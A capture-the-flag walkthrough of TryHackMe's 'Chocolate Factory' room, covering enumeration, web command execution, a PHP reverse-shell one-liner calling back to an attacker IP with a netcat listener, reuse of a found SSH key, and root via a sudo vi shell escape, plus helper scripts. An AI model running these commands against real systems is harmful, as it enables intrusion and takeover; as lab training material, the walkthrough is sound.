Chocolate Factory | TryHackMe
Task 1 Introduction
Welcome to Willy Wonka’s Chocolate Factory!
This room was designed so that hackers can revisit Willy Wonka’s Chocolate Factory and meet the Oompa Loompas.
This is a beginner friendly room!
If you have any issues / queries you can reach us through Discord or Twitter.
( Created by AndyInfosec team for the community! )
1. Deploy the machine!
Answer: No Answer Needed
Task 2 Challenges
Let’s start with a basic nmap scan to see which ports are open, then use gobuster to discover directories.
ENUMERATION
For nmap type the following command:
sudo nmap -p- -n <machine ip>
You can add -v for verbosity. -p- scans all 65535 ports instead of nmap’s default top 1000, and -n skips reverse DNS resolution (its opposite, -R, always resolves).
Here is the output:
As you can see, many ports are open. Let’s start with port 80.
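Since the scan output above is only a screenshot, here is an added helper (my own example, not part of the original writeup) that pulls the open ports and their services out of nmap’s grepable output. It assumes the scan was also saved with -oG scan.gnmap, which the command above does not do; the sample output below is constructed and its port list is illustrative only, not the room’s real scan.

```python
from typing import Dict, List, Tuple

# Constructed sample of nmap's grepable (-oG) output. Not the room's real scan;
# the host and port list are illustrative only.
SAMPLE_GNMAP = """# Nmap 7.91 scan initiated Sat Feb 20 10:00:00 2021 as: nmap -p- -n -oG scan.gnmap 10.10.10.10
Host: 10.10.10.10 ()\tStatus: Up
Host: 10.10.10.10 ()\tPorts: 21/open/tcp//ftp///, 22/open/tcp//ssh///, 80/open/tcp//http///, 113/filtered/tcp//ident///\tIgnored State: closed (65531)
# Nmap done at Sat Feb 20 10:01:00 2021 -- 1 IP address (1 host up) scanned in 60.00 seconds
"""


def parse_gnmap(text: str) -> List[Tuple[str, int, str, str, str]]:
    """Return (host, port, proto, state, service) for every port entry in -oG output.

    -oG writes one tab-separated record per host; the Ports: field holds
    comma-separated entries in the form port/state/proto/owner/service/rpcinfo/version.
    """
    results = []
    for line in text.splitlines():
        if not line.startswith("Host:") or "Ports:" not in line:
            continue  # comments, "Status: Up" lines, trailer
        host = line.split()[1]
        ports_field = line.split("Ports:", 1)[1].split("\t", 1)[0]
        for entry in ports_field.split(","):
            entry = entry.strip()
            if not entry:
                continue
            fields = entry.split("/")
            port, state, proto, service = int(fields[0]), fields[1], fields[2], fields[4]
            results.append((host, port, proto, state, service))
    return results


def open_ports(text: str) -> List[int]:
    """Sorted list of ports nmap reported as open (filtered/closed are dropped)."""
    return sorted(port for _, port, _, state, _ in parse_gnmap(text) if state == "open")


def service_map(text: str) -> Dict[int, str]:
    """Open port -> service name, handy for deciding what to enumerate next."""
    return {port: service for _, port, _, state, service in parse_gnmap(text) if state == "open"}


if __name__ == "__main__":
    for port, service in sorted(service_map(SAMPLE_GNMAP).items()):
        print(f"{port}/tcp open {service}")
```

Feed it the real file with parse_gnmap(open("scan.gnmap").read()); the Host/Ports record format is stable across nmap versions, so nothing else needs changing.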
I found a login page. Inspecting the page source showed a reference to validate.php.
Something seemed fishy there: the username field is named “uname”, which is also the name of the Linux uname command, so I guessed the operating system is Linux. I moved on and tried port 21 (FTP) from the terminal.
I didn’t know the username either, so I just guessed, since the banner says “Welcome to Willy Wonka’s Chocolate Factory”. The FTP login was password protected, and SSH was not an option yet because we had no credentials. So let’s brute-force web directories to find a hint.
In terminal type the following command to directory bruteforce:
sudo gobuster dir -u http://<machine ip>/ -w /home/prowl/SecLists/Discovery/Web-Content/big.txt -x txt,php,py,sh -o dir_brute
I’m using big.txt because it is a good general-purpose wordlist for web content discovery. -x adds file extensions to try for each word, and -o writes the results to a file.
The scan found /home.php. Let’s visit it.
Okay!! This is interesting: the page has a command box. Let’s check whether it really executes Linux commands. Type:
uname -a
As the screenshot shows, the output of uname -a comes back, so we have command execution on the server. Now type another command:
cd /home/ && ls -al
This changes into /home and then runs ls -al to list all the files there.
As you can see, /home contains two directories: root and charlie.
Now let’s look in /var/www/html in case something is hidden there.
There is a file named key_rev_key. Let’s try to read it:
cat key_rev_key
The output is not readable, and running commands through this box is clumsy, so let’s get a proper shell.
GAINING ACCESS
Let’s find a one-liner PHP reverse shell and run it from the command box. I took one from a reverse-shell cheat sheet site.
We want php reverse shell which is:
php -r '$sock=fsockopen("ip-address",port);exec("/bin/sh -i <&3 >&3 2>&3");'
Enter your VPN IP as the ip-address and any port you like as the listening port. The shell is attached to file descriptor 3 because the socket opened by fsockopen takes the first free descriptor after stdin, stdout and stderr.
Final command is:
php -r '$sock=fsockopen("10.8.116.182",1234);exec("/bin/sh -i <&3 >&3 2>&3");'
On the other side start your netcat listener :
nc -nvlp 1234
Now execute the above php shell.
As you can see we got a shell, but it is unstable. To upgrade it to a proper TTY, type:
python -c 'import pty; pty.spawn("/bin/bash")'
Now that we have a usable shell, let’s look around for our answers.
I cat the same key_rev_key file in /var/www/html that we found earlier through home.php, and this time the key was in the output.
1. Enter the key you found!
After this I went straight to the /home directory.
There are several files there; cat teleport shows an SSH private key for charlie.
Copy the whole RSA key into a text file on your Kali machine. I named it id_rsa and saved it on my Desktop.
In a new terminal I converted the key to a hash format that john can brute-force, but john reported that the key has no password.
I thought I was doing something wrong and tried again and again, but after 30 minutes I understood that the key has no passphrase and I can connect over SSH with it directly.
ssh refuses a key file that other users can read, so run chmod 600 on it first, then pass it with -i:
ssh -i id_rsa charlie@<machine-ip>
And BOOM!!! You’re in. Congratulations.
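The half hour spent on john could have been avoided by first checking whether the key is passphrase-protected at all. As an added example (mine, not from the original writeup), the following parses the two OpenSSH private key formats: the openssh-key-v1 container, whose header names the cipher and KDF (both “none” when unencrypted), and the legacy PEM format, which signals encryption with a Proc-Type: 4,ENCRYPTED header. The sample keys are constructed with placeholder key material so the script runs offline; they are not charlie’s key.

```python
import base64
import struct


def _ssh_string(b: bytes) -> bytes:
    """Length-prefixed string as used throughout the SSH wire/key formats."""
    return struct.pack(">I", len(b)) + b


def _armor(label: str, der: bytes, headers: str = "") -> str:
    """Wrap raw bytes in PEM armor, optionally with RFC 1421 style header lines."""
    body = base64.encodebytes(der).decode()  # 76-column lines, each newline-terminated
    return f"-----BEGIN {label}-----\n{headers}{body}-----END {label}-----\n"


def make_openssh_key(cipher: bytes, kdf: bytes) -> str:
    """Build a minimal openssh-key-v1 container with the given cipher/kdf header.

    Only the header is meaningful; the key material is a placeholder constructed
    for this demo, so the result cannot be used to authenticate anywhere.
    """
    blob = (b"openssh-key-v1\x00"
            + _ssh_string(cipher) + _ssh_string(kdf) + _ssh_string(b"")  # cipher, kdf, kdfoptions
            + struct.pack(">I", 1)                                        # number of keys
            + _ssh_string(b"placeholder-public") + _ssh_string(b"placeholder-private"))
    return _armor("OPENSSH PRIVATE KEY", blob)


def make_pem_key(encrypted: bool) -> str:
    """Legacy 'RSA PRIVATE KEY' PEM with placeholder DER (constructed, not a real key)."""
    headers = "Proc-Type: 4,ENCRYPTED\nDEK-Info: AES-128-CBC,00112233445566778899AABBCCDDEEFF\n\n" if encrypted else ""
    return _armor("RSA PRIVATE KEY", b"placeholder-der", headers)


def key_is_encrypted(pem: str) -> bool:
    """True if the private key needs a passphrase, False if it can be used as-is."""
    lines = [l.strip() for l in pem.strip().splitlines()]
    header = lines[0]
    if header == "-----BEGIN OPENSSH PRIVATE KEY-----":
        blob = base64.b64decode("".join(lines[1:-1]))
        magic = b"openssh-key-v1\x00"
        if not blob.startswith(magic):
            raise ValueError("not an openssh-key-v1 blob")
        off = len(magic)
        (n,) = struct.unpack(">I", blob[off:off + 4]); off += 4
        cipher = blob[off:off + n]; off += n
        (n,) = struct.unpack(">I", blob[off:off + 4]); off += 4
        kdf = blob[off:off + n]
        return cipher != b"none" or kdf != b"none"
    if header.startswith("-----BEGIN ") and header.endswith(" PRIVATE KEY-----"):
        # Legacy PEM (RSA/DSA/EC): encryption is signalled by a Proc-Type header line.
        return any(l.startswith("Proc-Type:") and "ENCRYPTED" in l for l in lines)
    raise ValueError("unrecognised private key format")


if __name__ == "__main__":
    import sys
    path = sys.argv[1] if len(sys.argv) > 1 else None
    pem = open(path).read() if path else make_openssh_key(b"none", b"none")
    print("passphrase required" if key_is_encrypted(pem) else "no passphrase: use it with ssh -i directly")
```

On a real key file, ssh-keygen -y -P '' -f id_rsa performs the same check: it prints the public key when the file is unencrypted and fails when a passphrase is needed. Either way, chmod 600 the file before handing it to ssh.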
Type whoami
As you can see, we’re charlie now. Let’s look through the directories to see what we can find from here.
After hours of searching I found charlie’s password in /var/www/html. I cat every file there and finally found it in validate.php; it is hard-coded in the server-side script, which is why it was not visible when I inspected the page in the browser.
2. What is Charlie’s password?
3. Change user to charlie.
Answer: No answer needed.
Then I went to /home/charlie, where I found the user.txt flag, and cat it.
4. Enter The user Flag.
PRIVILEGE ESCALATION
Type sudo -l to see what we can run with sudo without a password.
The output shows we can run vi with sudo, so look up vi on GTFOBins for its sudo shell escape.
Copy the sudo command from the GTFOBins entry
and paste it into the SSH session.
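To make the sudo -l step systematic, here is an added example (mine, not from the writeup) that parses sudo -l output and flags entries whose binary has a known sudo shell escape on GTFOBins. The sample output and hostname are constructed, and the GTFOBins table is a small hand-picked subset copied from the site’s sudo entries; the vi entry is the one that applies to this box.

```python
import os
import re
from typing import Dict, List, NamedTuple, Tuple

# Constructed sample of `sudo -l` output; the room's real output is not reproduced here.
SAMPLE_SUDO_L = r"""Matching Defaults entries for charlie on chocolate-factory:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User charlie may run the following commands on chocolate-factory:
    (ALL : ALL) NOPASSWD: /usr/bin/vi
    (root) /usr/bin/systemctl status apache2
"""


class SudoRule(NamedTuple):
    runas: str       # contents of the (user : group) part
    nopasswd: bool   # True when the NOPASSWD: tag is present
    command: str     # the command spec, possibly with arguments, or ALL


# "(runas) TAG: TAG: command" ; tags are upper-case words followed by a colon.
RULE_RE = re.compile(r"^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmd>.+?)\s*$")


def parse_sudo_l(text: str) -> List[SudoRule]:
    """Extract the rule lines that follow 'User X may run the following commands'."""
    rules: List[SudoRule] = []
    in_rules = False
    for line in text.splitlines():
        if line.startswith("User ") and "may run the following" in line:
            in_rules = True
            continue
        if not in_rules:
            continue
        m = RULE_RE.match(line)
        if m:
            tags = m.group("tags").replace(":", " ").split()
            rules.append(SudoRule(m.group("runas").strip(), "NOPASSWD" in tags, m.group("cmd")))
    return rules


# Binaries with a documented sudo shell escape on GTFOBins (https://gtfobins.github.io/).
# Hand-picked subset, not the full list; each value is the escape as listed there.
GTFOBINS_SUDO: Dict[str, str] = {
    "vi": "sudo vi -c ':!/bin/sh' /dev/null",
    "vim": "sudo vim -c ':!/bin/sh'",
    "less": "sudo less /etc/profile   (then type !/bin/sh)",
    "find": "sudo find . -exec /bin/sh \\; -quit",
    "awk": "sudo awk 'BEGIN {system(\"/bin/sh\")}'",
    "python": "sudo python -c 'import os; os.system(\"/bin/sh\")'",
}


def escalation_candidates(text: str) -> List[Tuple[str, bool, str]]:
    """(sudo command spec, needs no password?, GTFOBins escape) for each flagged rule."""
    out = []
    for rule in parse_sudo_l(text):
        binary = os.path.basename(rule.command.split()[0])
        if binary in GTFOBINS_SUDO:
            out.append((rule.command, rule.nopasswd, GTFOBINS_SUDO[binary]))
    return out


if __name__ == "__main__":
    for spec, nopasswd, escape in escalation_candidates(SAMPLE_SUDO_L):
        print(f"{spec} ({'NOPASSWD' if nopasswd else 'password needed'}): {escape}")
```

Pipe the real output in with sudo -l | python3 this_script.py after swapping SAMPLE_SUDO_L for sys.stdin.read(); the candidate line for this box is the vi escape, which drops you into a root shell from inside the editor.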
BOOM!!! We are root now. Let’s read the root flag.
Go to /root and cat root.txt. But there is also a file named root.py.
Let’s run root.py with:
python root.py
It asks for a key. We found that key at the very beginning. Enter it.
5. Enter the root flag.
AND CHEERS!!! WE’VE SUCCESSFULLY OWNED THE MACHINE.